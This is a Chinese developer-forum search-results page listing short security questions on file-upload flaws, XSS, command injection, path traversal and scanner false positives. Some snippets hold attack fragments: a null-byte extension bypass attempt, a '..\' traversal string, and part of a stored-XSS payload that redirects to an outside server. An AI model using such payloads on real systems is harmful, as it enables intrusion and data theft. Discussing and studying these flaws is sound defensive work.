腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
搜索
搜索
关闭
发布
搜索
关闭
文章
问答
(9999+)
视频
开发者手册
清单
用户
专栏
沙龙
全部问答
原创问答
Stack Exchange问答
更多筛选
回答情况:
全部
有回答
回答已采纳
提问时间:
不限
一周内
一月内
三月内
一年内
问题标签:
未找到与 相关的标签
筛选
重置
1
回答
文件
扩展名每次附加到
文件
名时,如何伪造
文件
扩展名?
我有一个
任意
文件
上传
漏洞
,我可以把我的
文件
放在任何目录。不幸的是,服务器端脚本总是将".jpg“追加到末尾,而我很难绕过它。%00 (NULL),\,似乎什么都不起作用。有人有什么想法吗?
浏览 0
修改于2019-05-07
得票数 0
0
回答
x-check
漏洞
是否误报?
数据库
、
漏洞扫描服务
、
解决方案
、
漏洞
、
漏洞管理
扫描出了 CRLF
漏洞
、路径穿越、
任意
文件
读写的
漏洞
场景:java controller传入一个参数ID,通过ID获取到数据库中的
文件
路径,进行下载,下载后端在请求头指定下载名称。x-check指出名称处存在CRLF
漏洞
。
任意
文件
删除更是离谱,这应该怎么解决?程序中有个生成临时<e
浏览 118
提问于2024-06-20
1
回答
XSS攻击允许JS
文件
上传
的网站?
考虑一个允许用户
上传
任意
JS
文件
的网站example.com,这些
文件
随后存储在服务器上,并提供给具有JS内容类型的访问者。攻击者可以利用这个来对example.com执行XSS攻击吗?如果您只是将受害者指向
上传
的JS
文件
的URL,浏览器将下载并显示代码,而不是执行它。除非存在其他
漏洞
,否则攻击者无法上载HTML
文件
或强制现有HTML
文件
包含脚本。我知道
文件
上传
存在很多安全问题,但这里我只对XSS的
浏览 0
修改于2020-01-23
得票数 2
2
回答
MS12-020:远程代码执行
报告指出,可以利用此
漏洞
远程执行代码。能用这个
漏洞
做点更好的事吗?是否存在允许在机器上执行某些
任意
代码的
漏洞
,还是只可能使其崩溃?
浏览 0
提问于2014-01-12
得票数 3
1
回答
用户上载和删除
文件
和
文件
夹的最佳
文件
权限
允许我允许人们在服务器上
上传
文件
。我应该在
上传
后更改
文件
名吗?如果是的话,我以后如何知道
文件
名,因为在CMS中,我需要tpo为它们提供图片或文档
文件
的url,以便他们在为网站生成文本时引用它们。i编写了一个程序,我的用户可以浏览一些
文件
和
文件
夹,他们可以在提到的
文件
夹中创建
任意
扩展名的
文件
夹和
上传
文件
。总之,我的代码用777权限创建所有
文件
和fo
浏览 0
提问于2012-02-26
得票数 0
回答已采纳
2
回答
Web应用程序
漏洞
扫描-假阳性-识别和消除
Web应用程序
漏洞
和潜在的假阳性 作为渗透测试器,应用程序
漏洞
扫描是任何渗透测试方法的重要组成部分。在应用程序扫描阶段,可能会出现几种不同类型的
漏洞
。主要是..。SQL注入/盲目SQL注入、跨站点脚本/持久性跨站点脚本、命令注入、XPath注入、SOAP/AJAX攻击、CSRF/HTTP响应拆分、
任意
文件
上传
攻击、远程
文件
包括(PHP代码注入)、应用程序errors根据我的经验,SQL注入
漏洞
将隐藏最错误的结果。
浏览 0
提问于2014-10-15
得票数 1
1
回答
用于查找Windows二进制
文件
中堆溢出的模糊工具
是否有可以扫描某些
任意
windows二进制
文件
并识别一组堆溢出
漏洞
的模糊工具? 例如,应用一组启发式方法或一组已知堆溢出
漏洞
列表来查找这些
漏洞
的工具,然后返回溢出攻击的位置和类型。
浏览 0
提问于2012-12-22
得票数 3
回答已采纳
2
回答
从stdin到shell的
任意
输入
shell脚本包装如下所示,但由于我将允许不受信任的用户在stdin
上传
递
任意
字符串,我想知道是否有可能有人在shell上执行
任意
命令。$CMD "`cat`" 以某种方式导致另一个
任意
命令运行
浏览 6
提问于2012-07-04
得票数 0
回答已采纳
1
回答
是否有权威的
漏洞
分类?
是否对
漏洞
进行了分类?但我没有找到权威的
漏洞
分类。在Web应用程序
漏洞
之下,应该有XSS/SSRF/XXE...。
浏览 0
修改于2020-09-09
得票数 0
回答已采纳
1
回答
如果您在应用服务器上,可以从数据库服务器获取数据吗?
您发现了一个
漏洞
,该
漏洞
允许您在应用服务器上执行
任意
操作系统命令。如何利用此
漏洞
检索数据库中保存的敏感应用程序数据?我的看法是,如果我可以执行
任意
OS命令,那么我将尝试从配置
文件
中查找数据库凭据,然后登录。(间接回答为否)。
浏览 0
修改于2018-08-22
得票数 0
回答已采纳
1
回答
CVE-2014-3802的攻击面是什么?
CVE-2014-3802说ZDI页面说: 利用此
漏洞
需要用户交互,因为目标必须访问恶意页面或打开恶意
文件
。我不清楚这个
漏洞
是如何激活的。PDB
文件
在调试程序时使用,这是否意味着只有当有人在目标计算机上放置恶意PDB
文件
并正在调试该程序时,才会出现该
漏洞
?
浏览 0
提问于2022-12-13
得票数 1
3
回答
不使用/利用
文件
名中的XSS
我试图利用
文件
上传
的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证
上传
文件
的
文件
名,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名
文件
以包含类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
修改于2018-04-19
得票数 2
回答已采纳
1
回答
漏洞
信息明细按修复指引修复后还存在??
漏洞
mod=viewthread&tid=4482 1) nginx
任意
文件
解析: 修复: php配置
文件
php.ini中配置cgi.fix_pathinfo=0 已经改了,但是还是一直提示有这个问题nginx
任意
文件
解析:<b>URL:</b></br><b>测试规则:</b>/asdf.php<b>URL:</b></br><b&
浏览 420
提问于2016-05-03
2
回答
如何避免
文件
上传
函数中的路径或目录操作?
在我正在做的
文件
上传
功能中,一个重要的问题是我可以保存图像用户
上传
的路径。在下面的代码中,我已经在基于web的应用程序
文件
夹中指定了保存
上传
文件
的
文件
夹。我的指导员告诉我,在asp.net UploadFile控件的代码后面还有一个安全
漏洞
,我不知道为什么!= @"~\Images\"; string comPath = Server.MapPath(path + "\\" + FileUpload1.File
浏览 4
修改于2013-03-24
得票数 2
1
回答
在ruamel.yaml中使用默认负载安全吗?
我可以使用ruamel.yaml加载和转储带有标记的YAML
文件
,并保留标记。 如果我让我的客户编辑YAML文档,他们会因为
任意
python模块代码执行而利用YAML
漏洞
吗?据我所知,ruamel.yaml是从PyYAML派生出来的,根据其文档,PyYAML存在这样的
漏洞
。
浏览 9
修改于2022-02-28
得票数 1
回答已采纳
2
回答
可能的
任意
文件
下载
漏洞
我正在审核Windows环境中一个可能存在
漏洞
的ASP代码。这意味着,以下提交的
文件
将不起作用,实际上将返回一个403被禁止的
文件
: \Only\Download\From\Here\..\..\..\..\..那么,我的问题是,是否有任何方法可以提交一个查询字符串来成功下载
任意
文件
?是否有任何方法可以提交一个
文件
URI,该URI将获取一个
文件
,并以某种方式注释掉/Only/Download/From/Here。编辑:总之,我正在
浏览 0
修改于2014-08-18
得票数 4
1
回答
文件
上传
安全
漏洞
我的代码中有没有
文件
上传
的安全
漏洞
?我在我的服务器端使用apache。在php.ini
文件
中启用了
文件
上传
。 <?
浏览 5
修改于2012-08-01
得票数 0
回答已采纳
1
回答
multer的
上传
文件
漏洞
我正在使用multer在我的应用程序中
上传
文件
。我只想确认一下,是否存在
文件
易受攻击的风险?请发表意见。
浏览 19
修改于2019-12-27
得票数 4
1
回答
通过EXIF注释
上传
.JPEG
文件
外壳程序
我最近遇到了这个咨询,我对这两个
漏洞
都感到有点困惑,特别是
文件
上传
漏洞
。我不明白如何实际利用这个条件(甚至是为什么它作为一个条件存在)。这个
漏洞
实际上是一个
漏洞
吗?或者,它只是一个PoC,显示您可以
上传
东西内部的东西(但实际上并不是利用它们)?
浏览 0
提问于2013-04-29
得票数 10
回答已采纳
1
回答
W3af vs手动渗透测试
与手动查找
漏洞
相比,w3af等工具在查找web应用程序
漏洞
方面的效率如何?他们是否能够找到OWASP前10名中的所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,仍然没有被发现?
浏览 0
提问于2014-11-27
得票数 0
第 2 页
第 3 页
第 4 页
第 5 页
第 6 页
第 7 页
第 8 页
第 9 页
第 10 页
第 11 页
点击加载更多
领券